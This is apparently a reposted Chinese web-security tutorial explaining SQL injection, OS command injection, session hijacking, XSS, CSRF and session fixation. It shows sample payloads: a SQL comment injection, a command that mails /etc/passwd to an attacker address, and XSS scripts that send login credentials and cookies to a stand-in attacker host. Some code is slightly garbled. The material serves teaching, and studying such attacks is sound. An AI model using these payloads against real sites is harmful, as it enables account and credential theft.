标签:用户输入 img 访问 shel 发布 set flag amp java
SELECT * FROM bookTb1 WHERE author = ‘作者‘--‘ and flag = 1
SQL语句中的--之后全部视为注释,即and flag = 1就会被忽略。
|/usr /sbin /sendmail ; cat /etc / passwd | mail hack@example.jp
会话劫持是指攻击者通过某种手段(例如:XSS获取对方的Cookie得到ID)拿到了用户的会话ID,并非法使用此ID伪装成用户,达到攻击的目的。
XSS是什么
跨站脚本攻击(Cross-Site Scripting,XSS)是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。XSS是攻击者利用鱼线设置的陷阱触发的被动攻击。例如:动态创建的HTML部分有可能隐藏着安全漏洞。
http://example.jp/login?ID="><script>var+f=document=> .getElementById(‘login‘);+f.action="http://hackr.jp/pwget";+f.method=> "get";</script><span+s="
浏览器打开URI后,直观上没有发生任何变化,但设置好的脚本偷偷开始运行了,当用户在表单内输入ID和密码之后,就会直接发送到攻击者的网站(也就是hackr.jp),导致个人登录信息被窃取。
2.对用户Cookie的窃取攻击
恶意构造的脚本同样能够以跨站脚本攻击的方式,窃取到用户的Cookie。
<script src = http://hackr.jp/xss.js></script>
该脚本内指定的http://hackr.jp/xss.js文件,即下面这段采用JS编写的代码
var content = escape(document.cookie) document.write("<img src = http://hackr.jp/?") document.write(content) document.write(">")
聊聊CSRF
跨站点请求伪造(CSRF)攻击是指攻击者通过设置好的陷阱,强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态更新,属于被动攻击。
https://xxxx.com/gift?giftId=aabbcc&_csrf_token=xxxxx
,那相当于攻击者就获取了_csrf_token,短时间内可以使用这个 token 来操作其他 GET 接口。
会话固定攻击强制用户使用攻击者指定的会话ID。
标签:用户输入 img 访问 shel 发布 set flag amp java
原文地址:https://www.cnblogs.com/vickylinj/p/11929948.html